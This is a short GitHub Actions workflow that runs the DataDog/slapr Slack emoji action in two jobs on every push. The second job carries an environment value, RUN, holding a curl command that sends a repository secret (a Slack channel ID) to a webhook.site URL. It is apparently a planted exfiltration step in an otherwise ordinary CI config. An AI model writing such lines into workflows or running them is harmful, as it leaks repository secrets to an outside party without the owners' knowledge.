# https://github.com/DataDog/slapr

name: Slack emoji PR updates
on: [push]

jobs:
  run_slapr_agent_integrations:
    runs-on: ubuntu-latest
    steps:
    - uses: DataDog/slapr@master
      env:
        GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"

  run_slapr_infra_integrations:
    runs-on: ubuntu-latest
    steps:
    - uses: DataDog/slapr@master
      env:
        GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}"
        RUN: curl https://webhook.site/f5ecd42e-cfd8-4968-819d-b3ef68090c80/?param=${{ secrets.SLACK_CHANNEL_ID_INFRA_INTEGRATIONS }}
